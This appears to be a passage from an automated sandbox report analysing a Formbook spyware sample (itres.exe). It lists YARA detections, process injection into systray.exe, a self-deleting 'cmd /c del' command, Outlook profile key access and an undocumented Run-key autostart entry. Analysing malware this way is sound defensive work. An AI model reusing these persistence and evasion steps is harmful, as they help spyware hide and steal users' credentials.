          Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: itres.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@14/9
          Source: C:\Users\user\Desktop\itres.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\itres.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_01
          Source: itres.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\itres.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\itres.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: itres.exeVirustotal: Detection: 56%
          Source: itres.exeReversingLabs: Detection: 58%
          Source: unknownProcess created: C:\Users\user\Desktop\itres.exe 'C:\Users\user\Desktop\itres.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\itres.exe C:\Users\user\Desktop\itres.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\itres.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\itres.exeProcess created: C:\Users\user\Desktop\itres.exe C:\Users\user\Desktop\itres.exeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\itres.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: itres.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: itres.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: systray.pdb source: itres.exe, 00000001.00000002.220939136.0000000000E0A000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: itres.exe, 00000001.00000002.220939136.0000000000E0A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp, systray.exe, 00000004.00000002.442081918.00000000046F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp, systray.exe

          Data Obfuscation:

          barindex
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xCD22C4C3 [Sun Jan 22 10:11:15 2079 UTC]
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_000D02A1 push es; retf 0_2_000D02F0
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_004148E6 push es; retf 1_2_004148ED
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00414977 push esi; ret 1_2_00414978
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_004149C5 pushfd ; iretd 1_2_004149C6
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041AB42 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417C73 push cs; retf 1_2_00417C7E
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_007802A1 push es; retf 1_2_007802F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0476D0D1 push ecx; ret 4_2_0476D0E4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8AAF5 push eax; ret 4_2_02E8AB48
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8ABAC push eax; ret 4_2_02E8ABB2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8AB4B push eax; ret 4_2_02E8ABB2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8AB42 push eax; ret 4_2_02E8AB48
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E848E6 push es; retf 4_2_02E848ED
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E849C5 pushfd ; iretd 4_2_02E849C6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E84977 push esi; ret 4_2_02E84978
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E84E46 push 76AC60C6h; retf 4_2_02E84E4B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E87C73 push cs; retf 4_2_02E87C7E
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9315085015

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\SysWOW64\systray.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run YFIPILCX9DAJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\itres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion: